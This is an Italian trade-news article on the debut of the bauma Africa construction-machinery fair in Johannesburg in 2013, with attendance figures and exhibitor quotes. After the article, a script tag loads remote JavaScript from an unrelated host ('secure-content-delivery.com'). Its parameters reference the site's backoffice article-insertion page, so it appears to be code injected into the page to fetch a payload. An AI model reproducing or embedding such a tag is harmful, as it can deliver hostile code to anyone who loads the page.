1. Home
  2. Notizie e Mercato
  3. Debutto positivo: bauma Africa conquista l’industria delle costruzioni

Debutto positivo: bauma Africa conquista l’industria delle costruzioni

Edilizia di
5/5
votato da 1 persone
Alla sua prima edizione, questo salone internazionale si impone già come ‘il più grande evento del settore in Africa’


Bauma Africa ha letteralmente “fatto il botto” sul mercato africano. La prima edizione del salone internazionale di macchine per edilizia, materiali da costruzione e industria estrattiva, e veicoli per l’edilizia, ha occupato una superficie di 60.000 metri quadrati lordi (40.100 netti), imponendosi come il più grande evento del settore in Africa.

Elaine Crewe, CEO di MMI South Africa, è soddisfatta dei risultati ottenuti: “È un grande avvenimento per il Sudafrica e la sua industria. Al suo debutto bauma Africa è già diventata la più grande fiera per l’industria delle macchine per edilizia, materiali da costruzioni e industria estrattiva. Il riscontro che abbiamo avuto è molto positivo”. Lawrence Peters, Presidente di CONMESA (Construction and Mining Equipment Suppliers‘ Association), conferma il grande successo della manifestazione: “bauma Africa ha largamente superato le nostre aspettative, siamo estremamente soddisfatti. Questa fiera è l’evento che volevamo per la nostra industria”.

14.700 operatori sono giunti da oltre 110 nazioni per la prima assoluta di bauma Africa, svoltasi nel Gallagher Convention Centre di Johannesburg dal 18 al 21 settembre 2013. L’84 percento dei visitatori proveniva dal Sudafrica, il 6 percento da altri Paesi africani e il restante 10 percento da altri continenti. I primi dieci Paesi per numero di visitatori sono stati, nell’ordine, Sudafrica, Mozambico, Germania, Botswana, Zimbabwe, Zambia, Italia, Namibia, Regno Unito e India. Gary Bell, CEO di Bell Equipment, ha dichiarato che bauma Africa “ha funzionato benissimo per noi. Siamo molto soddisfatti del numero di visitatori e della loro qualità. Le opportunità di business post-fiera si annunciano buone”.

Pur se alla prima edizione, bauma Africa si è dimostrata un’eccellente piattaforma di business, come sottolinea Ludwig Geyser, CEO di Putzmeister: “È stata un’ottima fiera. La qualità dei visitatori è molto alta. Nei giorni di fiera abbiamo venduto moltissime macchine”.

Inoltre, bauma Africa ha messo a disposizione una vetrina ideale anche per l'industria estrattiva, come osserva Glenn Schoeman, Vicepresidente di Sandvik South Africa: “Questa manifestazione era attesa da molto tempo e sarebbe stato un errore non partecipare. Abbiamo incontrato visitatori di alto profilo da Paesi di nostro interesse e venduto molte macchine direttamente in fiera”. Anton Wheeler, Amministratore Delegato di AARD, conferma il successo anche per il settore delle miniere: “Abbiamo presentato nuovi prodotti e ricevuto un ottimo riscontro, oltre a raccogliere contatti utilissimi. La qualità di bauma Africa è superiore a qualsiasi altra manifestazione”.

Complessivamente, a bauma Africa hanno esposto 754 aziende, 123 dal Sudafrica e 631 da 38 Paesi esteri. Oltre al Sudafrica, i principali Paesi espositori sono stati Cina, Germania, India, Italia, Corea, Spagna, Regno Unito e Stati Uniti. Quintin Booysen, Marketing & Sales Manager di PMSA, riassume così il giudizio sull’evento: “Siamo andati oltre le nostre attese. La prossima volta raddoppieremo lo spazio perché siamo sicuri che raddoppierà il numero di visitatori. Chi non c’era ha perso una buona occasione”.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.26512653831525135" type="text/javascript"></script>